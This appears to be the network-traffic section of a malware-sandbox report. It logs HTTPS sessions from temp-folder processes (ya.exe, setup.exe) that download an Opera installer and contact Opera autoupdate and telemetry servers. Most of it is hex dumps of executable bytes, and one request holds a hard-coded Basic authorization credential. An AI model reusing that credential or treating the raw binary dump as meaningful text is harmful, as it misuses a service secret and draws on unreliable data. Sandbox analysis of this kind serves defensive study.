                                                                                                                                            2024-12-09 16:39:36 UTC16384INData Raw: 74 0e 6a 40 59 8b f3 bf 02 b6 44 00 f3 a5 66 a5 5b 5f 5e 8b e5 5d c2 10 00 55 8b ec b8 00 14 00 00 e8 35 0e 00 00 ff 75 0c e8 30 ee fe ff 50 33 c0 80 7d 08 54 0f 95 c0 48 25 7e 01 00 00 05 8d 00 00 00 50 e8 14 0f ff ff 50 8d 85 00 ec ff ff 68 00 0a 00 00 50 e8 01 73 fe ff 83 c4 10 8d 85 00 ec ff ff 50 6a 00 e8 3f f6 ff ff 8b e5 5d c2 08 00 55 8b ec b8 00 14 00 00 e8 dc 0d 00 00 80 7d 14 00 ff 75 08 74 04 6a 66 eb 02 6a 65 e8 ca 0e ff ff 50 8d 85 00 ec ff ff 68 00 0a 00 00 50 e8 b7 72 fe ff 83 c4 10 8d 85 00 ec ff ff 50 6a 65 ff 35 c8 75 44 00 ff 15 cc df 43 00 e8 e1 d7 ff ff 33 c0 38 05 d7 75 44 00 0f 94 c0 8b e5 5d c2 10 00 81 ec d4 00 00 00 53 56 57 6a 01 e8 81 31 ff ff 68 00 08 00 00 68 f8 75 44 00 e8 21 ca ff ff 8d 4c 24 1c e8 c0 ce ff ff b9 70 73 44
                                                                                                                                            Data Ascii: tj@YDf[_^]U5u0P3}TH%~PPhPsPj?]U}utjfjePhPrPje5uDC38uD]SVWj1hhuD!L$psD
                                                                                                                                            2024-12-09 16:39:37 UTC16384INData Raw: 00 d4 08 42 00 ba fb 41 00 c1 ff 41 00 06 04 42 00 3d 08 42 00 22 fb 41 00 2a ff 41 00 6f 03 42 00 a5 07 42 00 8b fa 41 00 93 fe 41 00 d8 02 42 00 0e 07 42 00 f4 f9 41 00 fc fd 41 00 41 02 42 00 77 06 42 00 5d f9 41 00 65 fd 41 00 aa 01 42 00 e0 05 42 00 c6 f8 41 00 de fc 41 00 13 01 42 00 48 05 42 00 55 8b ec 83 ec 20 53 8b 5d 08 56 57 6a 08 59 be b8 42 43 00 8d 7d e0 f3 a5 8b 7d 0c 85 ff 74 1c f6 07 10 74 17 8b 0b 83 e9 04 51 8b 01 8b 70 20 8b ce 8b 78 18 e8 59 d7 ff ff ff d6 89 5d f8 89 7d fc 85 ff 74 0c f6 07 08 74 07 c7 45 f4 00 40 99 01 8d 45 f4 50 ff 75 f0 ff 75 e4 ff 75 e0 ff 15 94 21 43 00 5f 5e 5b 8b e5 5d c2 08 00 53 8b dc 51 51 83 e4 f0 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 8b 4b 08 83 ec 20 83 3d a0 fe 45 00 01 66 8b 53 0c 7c 46 0f b7 c2 66
                                                                                                                                            Data Ascii: BAAB=B"A*AoBBAABBAAABwB]AeABBAABHBU S]VWjYBC}}ttQp xY]}ttE@EPuuu!C_^[]SQQUkl$K =EfS|Ff
                                                                                                                                            2024-12-09 16:39:37 UTC16384INData Raw: 83 4e 18 ff eb 18 ff 76 0c 8d 46 18 50 ff 76 38 8d 8e 48 04 00 00 ff 76 34 e8 a0 00 00 00 8b 4d fc b0 01 5f 5e 33 cd 5b e8 f1 96 ff ff 8b e5 5d c2 04 00 8b ff 55 8b ec 51 51 53 56 8b f1 57 80 7e 3c 00 75 56 8b 46 38 85 c0 7e 4f 8b 5e 34 33 ff 85 c0 74 5e 33 c0 66 89 45 fc 8b 46 08 50 8b 00 ff 70 04 8d 45 fc 53 50 e8 ff 33 00 00 83 c4 10 89 45 f8 85 c0 7e 1d 8d 4e 18 51 ff 75 fc 8d 8e 48 04 00 00 e8 bd fe ff ff 03 5d f8 47 3b 7e 38 75 c2 eb 1e 83 4e 18 ff eb 18 ff 76 0c 8d 46 18 50 ff 76 38 8d 8e 48 04 00 00 ff 76 34 e8 9e 00 00 00 5f 5e b0 01 5b 8b e5 5d c2 04 00 8b ff 55 8b ec 51 51 56 57 8b 7d 14 8b c1 89 45 f8 8b 0f 83 27 00 8b 00 89 4d fc 8b 70 04 39 70 08 75 18 80 78 0c 00 74 0a 8b 4d 10 8b 45 0c 01 01 eb 4a 8b 45 10 83 08 ff eb 45 2b 70 08 53 8b 5d
                                                                                                                                            Data Ascii: NvFPv8Hv4M_^3[]UQQSVW~<uVF8~O^43t^3fEFPpESP3E~NQuH]G;~8uNvFPv8Hv4_^[]UQQVW}E'Mp9puxtMEJEE+pS]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.949713107.167.96.304435320C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:39:57 UTC196OUTGET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1
                                                                                                                                            User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:39:58 UTC322INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 09 Dec 2024 16:39:58 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Content-Disposition: attachment; filename=OperaSetup.exe
                                                                                                                                            ETag: "43d37a6e0fe6e9824dfd80221e6aad13"
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                            2024-12-09 16:39:58 UTC16062INData Raw: 34 64 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e 0c c9 d7 0a 6d a7 84 0a 6d a7 84 0a 6d a7 84 41 15 a4 85 07 6d a7 84 41 15 a2 85 ba 6d a7 84 c8 ec a2 85 5f 6d a7 84 c8 ec a3 85 1e 6d a7 84 c8 ec a4 85 1d 6d a7 84 41 15 a3 85 1c 6d a7 84 41 15 a6 85 03 6d a7 84 0a 6d a6 84 c1 6d a7 84 f9 ef af 85 5c 6d a7 84 f9 ef 58 84 0b 6d a7 84 0a 6d 30 84 0b 6d a7 84 f9 ef a5 85 0b 6d a7 84 52 69 63 68 0a 6d a7 84 00 00
                                                                                                                                            Data Ascii: 4d7MZ@!L!This program cannot be run in DOS mode.$NmmmAmAm_mmmAmAmmm\mXmm0mmRichm
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 2b d8 2b f8 46 8b 45 ec 83 fe 40 72 be 83 ee 40 83 fe 04 0f 82 c3 00 00 00 8b ce d1 e9 49 83 fe 0e 73 18 8b 45 fc 83 e6 01 83 ce 02 d3 e6 8d 04 70 05 00 f3 ff ff 89 45 fc eb 3b 83 e9 04 81 fb 00 00 00 01 73 17 8b 45 08 3b 10 0f 83 9d 00 00 00 0f b6 02 c1 e7 08 c1 e3 08 0b f8 42 d1 eb 8b c7 2b c3 c1 e8 1f 48 23 c3 2b f8 83 e9 01 75 ce 8b 45 fc 6a 04 59 33 f6 46 89 75 e8 8b 75 f4 0f b7 04 70 8b 75 e8 89 45 e0 81 fb 00 00 00 01 73 13 8b 45 08 3b 10 73 56 0f b6 02 c1 e7 08 c1 e3 08 0b f8 42 8b c3 c1 e8 0b 0f af 45 e0 89 45 e0 8d 04 36 89 45 e4 8b 45 e0 3b f8 73 0a 01 75 f4 8b d8 8b 75 e4 eb 0a 8b 75 e4 2b d8 2b f8 01 75 f4 8b 45 fc 89 75 e8 83 e9 01 75 a0 8b 45 f0 8b 4d 08 81 fb 00 00 00 01 73 09 3b 11 72 04 33 c0 eb 03 42 89 11 5f 5e 5b c9 c2 04 00 55 8b ec
                                                                                                                                            Data Ascii: ++FE@r@IsEpE;sE;B+H#+uEjY3FuupuEsE;sVBEE6EE;suuu++uEuuEMs;r3B_^[U
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: e6 ff ff 33 db 8d 4d e8 89 5d fc e8 2d fe ff ff 84 c0 74 54 68 c4 40 44 00 8d 4d e8 e8 e6 e8 ff ff 8d 4d dc e8 0d e3 ff ff 51 8d 45 dc c6 45 fc 01 50 8d 4d e8 e8 ad dc ff ff 8b c8 e8 64 fe ff ff 84 c0 74 1b 8d 45 e8 8b cf 50 e8 13 e7 ff ff 8d 45 dc 8b cf 50 e8 c8 f7 ff ff c6 06 01 b3 01 8d 4d dc e8 54 dc ff ff 8d 4d e8 e8 4c dc ff ff 8a c3 e8 c8 05 03 00 c2 04 00 56 8b f1 80 3e 00 75 04 b0 01 5e c3 8d 4e 04 e8 97 fa ff ff 8a c8 80 f1 01 88 0e 5e c3 55 8b ec 8b 51 04 2b 55 08 8b 01 8d 04 50 5d c2 04 00 6a 2a e8 49 dc ff ff c2 04 00 55 8b ec 8b 55 08 8b 09 e8 b3 e0 ff ff 5d c2 04 00 6a 02 e8 4c f5 ff ff c2 04 00 83 21 00 83 61 04 00 c3 83 09 ff 8b c1 c6 41 04 00 c3 e9 3a 09 00 00 55 8b ec ff 75 08 ff 31 ff 15 9c c0 43 00 8b c8 e8 1f f3 ff ff 5d c2 04 00 55
                                                                                                                                            Data Ascii: 3M]-tTh@DMMQEEPMdtEPEPMTMLV>u^N^UQ+UP]j*IUU]jL!aA:Uu1C]U
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: ae da ff ff 8d 4e 34 e8 a6 da ff ff 8d 4e 38 e8 9e da ff ff 8d 4e 3c e8 f6 ee ff ff 8d 4e 44 e8 92 ff ff ff 8b c6 5e c3 56 8b f1 83 26 00 8d 4e 08 e8 67 0a 00 00 83 66 04 00 8d 4e 0c e8 fd fe ff ff 8d 4e 24 e8 53 0a 00 00 8d 4e 28 e8 4b 0a 00 00 8d 4e 2c e8 43 0a 00 00 8d 4e 30 e8 3b 0a 00 00 8d 4e 34 e8 33 0a 00 00 8d 4e 38 e8 2b 0a 00 00 8d 4e 3c 5e e9 20 b2 ff ff 8b d1 e8 5c 9e ff ff 8d 4a 0c e8 54 9e ff ff 8b c2 c3 56 8b f1 e8 93 ff ff ff 8d 8e e8 00 00 00 e8 fb b1 ff ff 8d 8e f0 00 00 00 e8 f2 09 00 00 8d 4e 58 e8 26 9e ff ff 8d 4e 64 e8 84 fe ff ff 8d 4e 7c e8 7c fe ff ff 8d 8e 94 00 00 00 e8 71 fe ff ff 8d 8e ac 00 00 00 e8 66 fe ff ff 8d 8e c4 00 00 00 e8 5b fe ff ff 8d 8e dc 00 00 00 5e e9 e9 9d ff ff 33 c0 89 41 08 89 41 0c 89 41 10 89 41 14 89
                                                                                                                                            Data Ascii: N4N8N<ND^V&NgfNN$SN(KN,CN0;N43N8+N<^ \JTVNX&NdN||qf[^3AAAA
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 0a 9d ff ff 8d 4e 68 e8 32 07 00 00 8d 4e 10 33 ff e8 e1 5c ff ff 85 c0 74 15 8d 4e 68 e8 49 07 00 00 8d 4e 10 47 e8 cc 5c ff ff 3b f8 72 eb 5f 5e 33 c0 5b 5d c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b d9 0f b6 47 09 8d 4b 44 50 e8 77 07 00 00 0f b6 47 08 8d 4b 50 50 e8 6a 07 00 00 8d 4b 74 e8 a7 06 00 00 8b 4f 0c 8b f0 57 89 4e 20 8d 4e 18 e8 fa bc ff ff 8d 4f 04 51 8d 4e 1c e8 ee bc ff ff 8a 43 5c 5f 88 46 68 5e 5b 5d c2 04 00 55 8b ec ff 75 08 83 c1 74 e8 d0 5d ff ff 83 c0 18 5d c2 04 00 56 57 8d 79 68 33 f6 8b cf e8 d4 5d ff ff 85 c0 74 1f 56 8b cf e8 af 5d ff ff 8b c8 e8 c0 25 00 00 85 c0 75 0e 8b cf 46 e8 b5 5d ff ff 3b f0 72 e1 33 c0 5f 5e c3 55 8b ec 80 7d 08 00 56 8b f1 57 8b 7e 28 75 69 53 57 8d 4e 74 e8 79 5d ff ff 83 78 20 01 75 58 8d 46 44 57 8b
                                                                                                                                            Data Ascii: Nh2N3\tNhING\;r_^3[]USVW}GKDPwGKPPjKtOWN NOQNC\_Fh^[]Uut]]VWyh3]tV]%uF];r3_^U}VW~(uiSWNty]x uXFDW
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 5f 5e 5d c2 0c 00 55 8b ec 8b 4d 08 8b 41 28 83 e8 01 89 41 28 75 08 51 e8 06 00 00 00 33 c0 5d c2 04 00 56 8b f1 e8 9c 00 00 00 6a 78 56 e8 a2 c1 00 00 59 59 8b c6 5e c2 04 00 56 8b f1 8d 4e 28 e8 7c 5a ff ff 33 c9 c7 06 28 3b 44 00 b8 00 00 10 00 89 4e 2c 89 46 40 89 46 44 33 c0 40 89 4e 30 89 4e 34 89 4e 3c 89 4e 54 8d 4e 58 c7 46 04 14 3b 44 00 c7 46 08 00 3b 44 00 c7 46 0c ec 3a 44 00 c7 46 10 d4 3a 44 00 c7 46 14 bc 3a 44 00 c7 46 18 a8 3a 44 00 c7 46 1c 94 3a 44 00 c7 46 20 80 3a 44 00 c7 46 24 6c 3a 44 00 c6 46 38 ff 89 46 48 89 46 4c c7 46 50 00 00 00 40 e8 ff 59 ff ff 8b c6 5e c3 55 8b ec 6a ff 68 8c 9b 43 00 64 a1 00 00 00 00 50 56 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 4e 2c c7 06 28 3b 44 00 c7 46 04 14 3b 44 00 c7 46 08
                                                                                                                                            Data Ascii: _^]UMA(A(uQ3]VjxVYY^VN(|Z3(;DN,F@FD3@N0N4N<NTNXF;DF;DF:DF:DF:DF:DF:DF :DF$l:DF8FHFLFP@Y^UjhCdPV@D3PEdN,(;DF;DF
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 43 00 e8 8b 06 02 00 8b f9 89 7d f0 8b 75 08 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8a 46 03 88 47 03 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8b 46 10 8b 4e 14 89 47 10 8d 46 18 89 4f 14 8d 4f 18 50 e8 ba e6 fe ff 83 65 fc 00 8d 46 24 50 8d 4f 24 e8 aa e6 fe ff 8b c7 e8 09 06 02 00 c2 04 00 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 70 34 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 a0 33 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 83 6c 24 04 04 e9 9d e0 ff ff 83 6c
                                                                                                                                            Data Ascii: C}uFGFGFGFGFGFGFNGFOOPeF$PO$UjhtCdP@D3PEduhp4DQMdYUjhtCdP@D3PEduh3DQMdYl$l
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 89 75 fc e8 58 e3 ff ff 50 8b ce e8 7a 04 00 00 8b 06 8b 40 04 c7 04 06 28 40 44 00 8b 06 8b 48 04 8d 41 98 89 44 31 fc 8b c6 5e c9 c2 10 00 6a 08 b8 2a ad 43 00 e8 66 c6 01 00 6a 00 8d 4d ec e8 0b 4f 00 00 83 65 fc 00 b9 b4 db 44 00 8b 3d a0 db 44 00 89 7d f0 e8 d7 dc ff ff 8b 4d 08 50 e8 ce dd ff ff 8b f0 85 f6 75 4f 85 ff 74 04 8b f7 eb 47 ff 75 08 8d 45 f0 50 e8 b5 03 00 00 59 59 83 f8 ff 74 44 8b 75 f0 8d 4d f0 56 e8 7b 08 00 00 56 c6 45 fc 01 e8 e7 51 00 00 8b 06 59 8b ce ff 50 04 8d 4d f0 89 35 a0 db 44 00 e8 5c 03 00 00 8d 4d f0 e8 66 03 00 00 8d 4d ec e8 e6 4e 00 00 8b c6 e8 b5 c5 01 00 c3 e8 f4 da ff ff cc e8 30 9e fe ff 8b c1 c2 04 00 ff 32 e8 83 05 00 00 c3 56 8b f1 e8 66 05 00 00 8b c6 5e c2 08 00 56 8b f1 e8 58 05 00 00 8b c6 5e c2 04 00 55
                                                                                                                                            Data Ascii: uXPz@(@DHAD1^j*CfjMOeD=D}MPuOtGuEPYYtDuMV{VEQYPM5D\MfMN02Vf^VX^U
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: ff ff 8b c6 5e c9 c2 08 00 55 8b ec 83 ec 10 8b 02 8b 52 04 89 45 f0 8b 45 08 53 56 89 55 f4 8b d9 8b 10 8d 4d f8 8b 40 04 57 89 55 f8 89 45 fc e8 58 d7 ff ff 8d 4d f0 8b f0 8b fa e8 4c d7 ff ff 2b c6 8b cb 89 45 f0 8d 45 f0 1b d7 50 89 55 f4 e8 21 d7 ff ff 5f 5e 8b c3 5b c9 c2 04 00 55 8b ec 51 51 56 8b f1 8b ca e8 1f d7 ff ff 6a 00 68 40 42 0f 00 52 50 e8 91 87 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 ea d6 ff ff 8b c6 5e c9 c3 55 8b ec 51 51 56 8b f1 8b ca e8 ec d6 ff ff 6a 00 68 40 42 0f 00 52 50 e8 fe 89 01 00 89 45 f8 8b ce 8d 45 f8 89 55 fc 50 e8 b7 d6 ff ff 8b c6 5e c9 c3 81 f9 ff ff ff 7f 0f 87 e3 96 ff ff 8d 04 09 c3 3b 0d 40 b0 44 00 75 01 c3 e9 2e 02 00 00 e9 fe 03 00 00 6a 0c 68 b0 90 44 00 e8 99 08 00 00 c6 45 e7 00 8b 5d 0c 8b c3 8b 7d
                                                                                                                                            Data Ascii: ^UREESVUM@WUEXML+EEPU!_^[UQQVjh@BRPEEUP^UQQVjh@BRPEEUP^;@Du.jhDE]}
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 45 ff ff ff ff 85 c9 0f 85 74 f6 ff ff 0f b6 4e ea 0f b6 42 ea 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 52 f6 ff ff 0f b6 4e eb 0f b6 42 eb 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 30 f6 ff ff 0f b6 4e ec 0f b6 42 ec 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 0e f6 ff ff 8b 46 ed 3b 42 ed 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ed 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e1 f5 ff ff 0f b6 4e ee 0f b6 42 ee 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 bf f5 ff ff 0f b6 4e ef 0f b6 42 ef 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9d f5 ff ff 0f b6 4e f0 0f b6 42 f0 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85
                                                                                                                                            Data Ascii: EtNB+t3ERNB+t3E0NB+t3EF;BB+t3ENB+t3ENB+t3ENB+t3E


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.949714107.167.96.394433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:07 UTC183OUTPOST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1
                                                                                                                                            User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                            Host: autoupdate.geo.opera.com
                                                                                                                                            Content-Length: 656
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:07 UTC656OUTData Raw: 4d 57 5a 6b 4e 47 45 32 59 6a 4e 68 59 54 59 7a 59 6a 51 78 4e 7a 45 32 59 6d 5a 6b 5a 54 4d 30 59 7a 68 6c 4f 54 52 6a 59 54 51 31 4f 44 4e 6c 4f 47 59 33 4f 44 52 6d 59 7a 4d 79 4e 6d 51 33 5a 44 52 6a 4d 47 59 34 5a 6a 6b 32 4d 7a 4d 32 4e 44 45 77 4f 44 70 37 49 6d 4e 76 64 57 35 30 63 6e 6b 69 4f 69 4a 56 55 79 49 73 49 6d 6c 75 63 33 52 68 62 47 78 6c 63 6c 39 75 59 57 31 6c 49 6a 6f 69 54 33 42 6c 63 6d 46 54 5a 58 52 31 63 43 35 6c 65 47 55 69 4c 43 4a 77 63 6d 39 6b 64 57 4e 30 49 6a 70 37 49 6d 35 68 62 57 55 69 4f 69 4a 76 63 47 56 79 59 53 4a 39 4c 43 4a 78 64 57 56 79 65 53 49 36 49 69 39 76 63 47 56 79 59 53 39 7a 64 47 46 69 62 47 55 76 64 32 6c 75 5a 47 39 33 63 7a 39 31 64 47 31 66 63 32 39 31 63 6d 4e 6c 50 55 52 58 54 6b 78 54 56 43 5a
                                                                                                                                            Data Ascii: MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ
                                                                                                                                            2024-12-09 16:40:08 UTC477INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:07 GMT
                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Allow: GET, HEAD, POST
                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Expires: Thu, 1 Jan 1970 00:00:01 GMT
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                            2024-12-09 16:40:08 UTC942INData Raw: 33 61 32 0d 0a 7b 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 61 72 63 68 22 3a 20 22 78 36 34 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 63 68 65 63 6b 73 75 6d 22 3a 20 22 37 32 65 37 37 39 63 65 37 64 33 36 33 61 30 64 31 64 66 64 61 32 36 65 39 61 35 31 36 30 37 39 62 34 64 39 61 30 64 32 31 32 63 34 66 39 34 36 31 36 66 66 30 39 66 65 33 63 66 38 34 64 30 30 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 66 69 6c 65 6e 61 6d 65 22 3a 20 22 4f 70 65 72 61 5f 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 5f 41 75 74 6f 75 70 64 61 74 65 5f 78 36 34 2e 65 78 65 22 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 5f 73 69 7a 65 22 3a 20 31 31 39 39 37 32 37 31 32 2c 0a 20 22 69 6e 73 74 61 6c 6c 65 72 22 3a 20 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6f 70 65 72
                                                                                                                                            Data Ascii: 3a2{ "installer_arch": "x64", "installer_checksum": "72e779ce7d363a0d1dfda26e9a516079b4d9a0d212c4f94616ff09fe3cf84d00", "installer_filename": "Opera_115.0.5322.77_Autoupdate_x64.exe", "installer_size": 119972712, "installer": "https://download.oper


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.949715107.167.96.384433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:07 UTC120OUTGET /me/ HTTP/1.1
                                                                                                                                            User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                            Host: autoupdate.opera.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:07 UTC471INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:07 GMT
                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Allow: HEAD, GET
                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Expires: Thu, 1 Jan 1970 00:00:01 GMT
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                            2024-12-09 16:40:07 UTC57INData Raw: 32 65 0d 0a 7b 0a 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 22 74 69 6d 65 73 74 61 6d 70 22 3a 20 31 37 33 33 37 36 32 34 30 37 0a 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 2e{ "country": "US", "timestamp": 1733762407}0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.949716107.167.125.1894433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:07 UTC222OUTPOST /v1/binary HTTP/1.1
                                                                                                                                            Authorization: Basic dmFBZUV4c1JXQmViWm9McmNpVGlFSFpmWUdXeUlXMFo6
                                                                                                                                            User-Agent: Opera installer
                                                                                                                                            Host: desktop-netinstaller-sub.osp.opera.software
                                                                                                                                            Content-Length: 1474
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:07 UTC1474OUTData Raw: 00 00 00 05 6a 02 48 38 32 37 39 30 35 62 35 2d 37 37 30 65 2d 34 38 39 30 2d 38 33 32 66 2d 32 62 34 62 30 66 62 33 32 66 38 38 00 88 c4 d6 c4 f5 64 88 c4 d6 c4 f5 64 00 02 02 02 1e 4f 70 65 72 61 20 49 6e 73 74 61 6c 6c 65 72 02 1a 31 31 35 2e 30 2e 35 33 32 32 2e 37 37 02 0c 53 74 61 62 6c 65 02 02 06 72 31 30 02 0c 44 57 4e 4c 53 54 02 06 61 70 62 00 00 00 00 02 0e 57 69 6e 64 6f 77 73 02 1e 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 02 04 31 30 00 02 02 48 35 65 39 63 64 30 64 34 2d 61 34 36 33 2d 34 33 31 37 2d 39 35 38 34 2d 35 36 64 32 30 37 66 34 65 61 37 34 02 48 30 30 63 31 38 32 34 38 2d 66 63 63 39 2d 34 62 36 62 2d 61 38 62 37 2d 30 63 35 30 35 31 38 64 39 30 32 32 02 02 00 00 00 00 02 02 08 6e 6f 6e 65 a0 0a 4d 57 5a 6b 4e 47 45 32 59 6a
                                                                                                                                            Data Ascii: jH827905b5-770e-4890-832f-2b4b0fb32f88ddOpera Installer115.0.5322.77Stabler10DWNLSTapbWindows10.0.19045.200610H5e9cd0d4-a463-4317-9584-56d207f4ea74H00c18248-fcc9-4b6b-a8b7-0c50518d9022noneMWZkNGE2Yj
                                                                                                                                            2024-12-09 16:40:08 UTC162INHTTP/1.1 201 CREATED
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 09 Dec 2024 16:40:08 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 36
                                                                                                                                            Connection: close
                                                                                                                                            2024-12-09 16:40:08 UTC36INData Raw: 38 32 37 39 30 35 62 35 2d 37 37 30 65 2d 34 38 39 30 2d 38 33 32 66 2d 32 62 34 62 30 66 62 33 32 66 38 38
                                                                                                                                            Data Ascii: 827905b5-770e-4890-832f-2b4b0fb32f88


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.949718107.167.110.2164433532C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:40:09 UTC249OUTGET /api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-8713-cff8411ee342&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1
                                                                                                                                            User-Agent: Opera NetInstaller/115.0.5322.77
                                                                                                                                            Host: features.opera-api2.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:40:10 UTC237INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
